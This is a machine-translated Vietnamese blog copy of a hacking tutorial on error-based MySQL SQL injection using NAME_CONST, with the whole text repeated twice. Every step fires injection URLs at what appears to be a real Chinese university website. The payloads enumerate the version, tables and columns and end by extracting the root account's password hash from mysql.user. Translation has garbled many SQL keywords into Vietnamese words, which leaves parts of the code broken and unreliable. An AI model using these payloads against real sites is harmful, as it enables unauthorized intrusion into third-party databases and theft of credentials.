[TUT] NAME_CONST SQL Injection [Pics] |
Nó được một lúc kể từ khi tôi đã thực hiện một bài hướng dẫn SQL tiêm, vì vậy tôi nghĩ mình nên làm một bài hướng dẫn mới bằng cách sử dụng phương pháp name_const. Không có nhiều giấy tờ tài liệu phương pháp này, do đó, nó cảm thấy loại tốt là một để làm cho một hướng dẫn cho nó.
Thông tin
NAME_CONST đã được thêm vào trong MySQL 5.0.12, vì vậy nó sẽ không làm việc trên bất cứ điều gì ít hơn thế.
Mã số:
NAME_CONST (DATA, GIÁ TRỊ)
Trả về giá trị nhất định. Khi được sử dụng để sản xuất một cột tập hợp kết quả, NAME_CONST () gây ra các cột có tên. Các đối số phải là hằng số.
CHỌN NAME_CONST ('TEST', 1)
| --------------- |
| Test |
| |
| --------------- |
| 1 |
| |
| --------------- |
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Giới thiệu về biến MySQL
Một khi bạn đã có trang web dễ bị tổn thương của bạn, cho phép thử nhận được một số biến hệ thống MySQL sử dụng NAME_CONST.
Mã số:
http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261 '
Spoiler (Click để ẩn)
[Image: V4jDb.png]
Mã số:
và + 1 = (chọn + * + từ + (chọn + NAME_CONST (VAR, 1), NAME_CONST (VAR, 1)) + là + x) -
VAR = biến MySQL của bạn.
MySQL 5.1.3 Các biến hệ thống máy chủ
Hãy thử nó ra trên trang web của tôi ..
Mã số:
http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(vers ion (), 1)) + là + x) -
Lỗi: Duplicate tên cột '5.0.27-community-nt'
Spoiler (Click để ẩn)
[Image: Um5vX.png]
Bây giờ tôi đã thử một vài trang web, và tôi đã nhận được các cuộc gọi không hợp lệ để NAME_CONST cố gắng để trích xuất dữ liệu. Không có gì là sai với cú pháp của tôi, chỉ là sẽ không làm việc ở đó. May mắn thay, họ làm việc ở đây vì vậy hãy nhận này sẽ một lần nữa ...
Khai thác dữ liệu
Mã số:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
Chúng tôi sẽ nhận được một bản sao cột 1 lỗi ...
Mã số:
http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME _CONST ((Chọn + 1 + hạn + 0,1), 1)) + là + x) -
Lỗi: Duplicate tên cột '1
Spoiler (Click để ẩn)
[Image: hRaSm.png]
Bây giờ chúng ta hãy bàn ra chó cái này ..
Mã số:
+ Và + 1 = (chọn + * + từ + (chọn + NAME_CONST ((chọn + table_name + từ + ema.tables information_sch + nơi + table_schema = cơ sở dữ liệu () + Hạn mức + 0,1), 1), NAME_CONST ((chọn + table_ tên + từ + information_schema.tables + nơi + table_schema = cơ sở dữ liệu () + Hạn mức + 0,1), 1)) + là + x) -
Hãy xem nếu nó hoạt động ở đây, nếu có, chúng tôi có thể đi và kết thúc công việc.
Mã số:
http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+info rmation_schema.tables + nơi + table_schema = cơ sở dữ liệu () + hạn + 0,1), 1), NAME_CONST ((se lect + table_name từ + + + information_schema.tables nơi + table_schema = cơ sở dữ liệu () + lim nó + 0,1), 1)) + là + x) -
Lỗi: Duplicate tên cột 'com_admanage
Spoiler (Click để ẩn)
[Image: jQ5Gg.png]
Bây giờ tôi sẽ để được lười biếng và sử dụng mysql.user làm ví dụ, chỉ vì lợi ích của thời gian.
Bạn có thể lấy ra các cột của bảng người dùng ..
Mã số:
+ Và + 1 = (chọn + * + từ + (chọn + NAME_CONST ((chọn + column_name + từ + information_sc hema.columns + nơi + table_name = 0xHEX_OF_TABLENAME + Hạn mức + 0,1), 1), NAME_CONST ((SELEC t + column_name + từ + information_schema + nơi + table_name = 0xHEX_OF_TABLENAM E + hạn + 0,1), 1)) + là + x) -
Vì vậy, tôi trông như thế này, và tôi nhận được tên cột trùng lặp 'Host'.
Mã số:
http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+inf ormation_schema.columns + nơi + table_schema = 0x6d7973716c + và + table_name = 0x7573657 2 + hạn + 0,1), 1), NAME_CONST ((chọn + column_name + từ + information_schema + w đây + table_schema = 0x6d7973716c + và + table_name = 0x75736572 + Hạn mức + 0,1), 1)) + là + x) -
Lỗi: Nhân đôi cột tên "Host '
Spoiler (Click để ẩn)
[Image: ykB6F.png]
Woot, thời gian để hoàn thành chó cái này đi.
Mã số:
+ Và + 1 = (chọn + * + từ + (chọn + NAME_CONST ((chọn + concat_ws (0x207e20, COLUMN1, COLU Mn2) + từ + TABLENAME + Hạn mức + 0,1), 1), NAME_CONST ((chọn + concat_ws ( 0x207e20, COLUMN1, COLUMN2) + từ + TABLENAME + Hạn mức + 0,1), 1)) + là + x) -
Vì vậy, tôi trông như thế này ...
Mã số:
http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,U ser, Password) + từ + mysql.user + Hạn mức + 0,1), 1), NAME_CONST ((chọn + concat_ws (0x207e2 0, tài khoản, mật khẩu) + từ + mysql.user + Hạn mức + 0,1) , 1)) + là + x) -
Lỗi: Duplicate tên cột 'root ~ * B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
Spoiler (Click để ẩn)
[Image: U472J.png]
Và chúng tôi đã có nó, cảm ơn bạn đã đọc.
Thông tin
NAME_CONST đã được thêm vào trong MySQL 5.0.12, vì vậy nó sẽ không làm việc trên bất cứ điều gì ít hơn thế.
Mã số:
NAME_CONST (DATA, GIÁ TRỊ)
Trả về giá trị nhất định. Khi được sử dụng để sản xuất một cột tập hợp kết quả, NAME_CONST () gây ra các cột có tên. Các đối số phải là hằng số.
CHỌN NAME_CONST ('TEST', 1)
| --------------- |
| Test |
| |
| --------------- |
| 1 |
| |
| --------------- |
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Giới thiệu về biến MySQL
Một khi bạn đã có trang web dễ bị tổn thương của bạn, cho phép thử nhận được một số biến hệ thống MySQL sử dụng NAME_CONST.
Mã số:
http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261 '
Spoiler (Click để ẩn)
[Image: V4jDb.png]
Mã số:
và + 1 = (chọn + * + từ + (chọn + NAME_CONST (VAR, 1), NAME_CONST (VAR, 1)) + là + x) -
VAR = biến MySQL của bạn.
MySQL 5.1.3 Các biến hệ thống máy chủ
Hãy thử nó ra trên trang web của tôi ..
Mã số:
http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(vers ion (), 1)) + là + x) -
Lỗi: Duplicate tên cột '5.0.27-community-nt'
Spoiler (Click để ẩn)
[Image: Um5vX.png]
Bây giờ tôi đã thử một vài trang web, và tôi đã nhận được các cuộc gọi không hợp lệ để NAME_CONST cố gắng để trích xuất dữ liệu. Không có gì là sai với cú pháp của tôi, chỉ là sẽ không làm việc ở đó. May mắn thay, họ làm việc ở đây vì vậy hãy nhận này sẽ một lần nữa ...
Khai thác dữ liệu
Mã số:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
Chúng tôi sẽ nhận được một bản sao cột 1 lỗi ...
Mã số:
http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME _CONST ((Chọn + 1 + hạn + 0,1), 1)) + là + x) -
Lỗi: Duplicate tên cột '1
Spoiler (Click để ẩn)
[Image: hRaSm.png]
Bây giờ chúng ta hãy bàn ra chó cái này ..
Mã số:
+ Và + 1 = (chọn + * + từ + (chọn + NAME_CONST ((chọn + table_name + từ + ema.tables information_sch + nơi + table_schema = cơ sở dữ liệu () + Hạn mức + 0,1), 1), NAME_CONST ((chọn + table_ tên + từ + information_schema.tables + nơi + table_schema = cơ sở dữ liệu () + Hạn mức + 0,1), 1)) + là + x) -
Hãy xem nếu nó hoạt động ở đây, nếu có, chúng tôi có thể đi và kết thúc công việc.
Mã số:
http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+info rmation_schema.tables + nơi + table_schema = cơ sở dữ liệu () + hạn + 0,1), 1), NAME_CONST ((se lect + table_name từ + + + information_schema.tables nơi + table_schema = cơ sở dữ liệu () + lim nó + 0,1), 1)) + là + x) -
Lỗi: Duplicate tên cột 'com_admanage
Spoiler (Click để ẩn)
[Image: jQ5Gg.png]
Bây giờ tôi sẽ để được lười biếng và sử dụng mysql.user làm ví dụ, chỉ vì lợi ích của thời gian.
Bạn có thể lấy ra các cột của bảng người dùng ..
Mã số:
+ Và + 1 = (chọn + * + từ + (chọn + NAME_CONST ((chọn + column_name + từ + information_sc hema.columns + nơi + table_name = 0xHEX_OF_TABLENAME + Hạn mức + 0,1), 1), NAME_CONST ((SELEC t + column_name + từ + information_schema + nơi + table_name = 0xHEX_OF_TABLENAM E + hạn + 0,1), 1)) + là + x) -
Vì vậy, tôi trông như thế này, và tôi nhận được tên cột trùng lặp 'Host'.
Mã số:
http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+inf ormation_schema.columns + nơi + table_schema = 0x6d7973716c + và + table_name = 0x7573657 2 + hạn + 0,1), 1), NAME_CONST ((chọn + column_name + từ + information_schema + w đây + table_schema = 0x6d7973716c + và + table_name = 0x75736572 + Hạn mức + 0,1), 1)) + là + x) -
Lỗi: Nhân đôi cột tên "Host '
Spoiler (Click để ẩn)
[Image: ykB6F.png]
Woot, thời gian để hoàn thành chó cái này đi.
Mã số:
+ Và + 1 = (chọn + * + từ + (chọn + NAME_CONST ((chọn + concat_ws (0x207e20, COLUMN1, COLU Mn2) + từ + TABLENAME + Hạn mức + 0,1), 1), NAME_CONST ((chọn + concat_ws ( 0x207e20, COLUMN1, COLUMN2) + từ + TABLENAME + Hạn mức + 0,1), 1)) + là + x) -
Vì vậy, tôi trông như thế này ...
Mã số:
http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,U ser, Password) + từ + mysql.user + Hạn mức + 0,1), 1), NAME_CONST ((chọn + concat_ws (0x207e2 0, tài khoản, mật khẩu) + từ + mysql.user + Hạn mức + 0,1) , 1)) + là + x) -
Lỗi: Duplicate tên cột 'root ~ * B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
Spoiler (Click để ẩn)
[Image: U472J.png]
Và chúng tôi đã có nó, cảm ơn bạn đã đọc.
Đăng bài lên facebook !
ĐĂNG NHẬN XÉT
Cám ơn đã đọc bài viết!
+ Mọi sai xót, thắc mắc xin chia sẻ bên dưới.
+ Hãy viết bằng tiếng Việt có dấu mọi người nha.
+ Mọi sai xót, thắc mắc xin chia sẻ bên dưới.
+ Hãy viết bằng tiếng Việt có dấu mọi người nha.
Bài viết có 0 nhận xét:
Đăng nhận xét